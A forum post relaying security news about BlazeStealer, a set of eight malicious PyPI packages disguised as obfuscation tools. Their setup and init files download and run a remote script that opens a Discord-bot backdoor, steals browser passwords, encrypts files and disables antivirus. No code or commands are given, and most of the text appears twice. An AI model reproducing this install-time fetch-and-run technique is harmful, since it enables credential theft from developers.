Lord777
Professional
- Messages
- 2,579
- Reaction score
- 1,478
- Points
- 113
A new set of malicious Python packages, whose authors want to steal confidential information from software developers devices, has entered the Python Package Index (PyPI) repository. The malware was combined under the common name BlazeStealer.
According to Checkmarx experts who discovered the cyber threat, the packages are disguised as seemingly secure obfuscation tools.
"BlazeStealer is able to download additional malicious script from a third-party source. This script activates the Discord bot, which gives the attacker full access to the victim's computer," the researchers write in the report.
Apparently, this campaign was launched in January 2023, with a total of eight packages participating: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood. The latter dates back to October.
Each of these packages has setup files.py and init.py, whose task is to pull out a Python script hosted on transfer[.]sh. After installation, this script is executed immediately.
As noted above, BlazeStealer uses the Discord bot and allows authors to collect a whole range of important data (including passwords from browsers), take screenshots, execute arbitrary commands, encrypt files, and even disable the Microsoft Defender antivirus built into Windows.
Moreover, the malware can seriously complicate or make it impossible to work with the computer due to inadequate consumption of CPU resources, as well as put a Batch script in the autorun directory to turn off the device and even cause a blue screen of death (BSoD).
In total, the packages were downloaded 2,438 times, with the largest number of downloads coming from China, Russia, Ireland, Hong Kong, Croatia, France and Spain.
According to Checkmarx experts who discovered the cyber threat, the packages are disguised as seemingly secure obfuscation tools.
"BlazeStealer is able to download additional malicious script from a third-party source. This script activates the Discord bot, which gives the attacker full access to the victim's computer," the researchers write in the report.
Apparently, this campaign was launched in January 2023, with a total of eight packages participating: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood. The latter dates back to October.
Each of these packages has setup files.py and init.py, whose task is to pull out a Python script hosted on transfer[.]sh. After installation, this script is executed immediately.
As noted above, BlazeStealer uses the Discord bot and allows authors to collect a whole range of important data (including passwords from browsers), take screenshots, execute arbitrary commands, encrypt files, and even disable the Microsoft Defender antivirus built into Windows.
Moreover, the malware can seriously complicate or make it impossible to work with the computer due to inadequate consumption of CPU resources, as well as put a Batch script in the autorun directory to turn off the device and even cause a blue screen of death (BSoD).
In total, the packages were downloaded 2,438 times, with the largest number of downloads coming from China, Russia, Ireland, Hong Kong, Croatia, France and Spain.
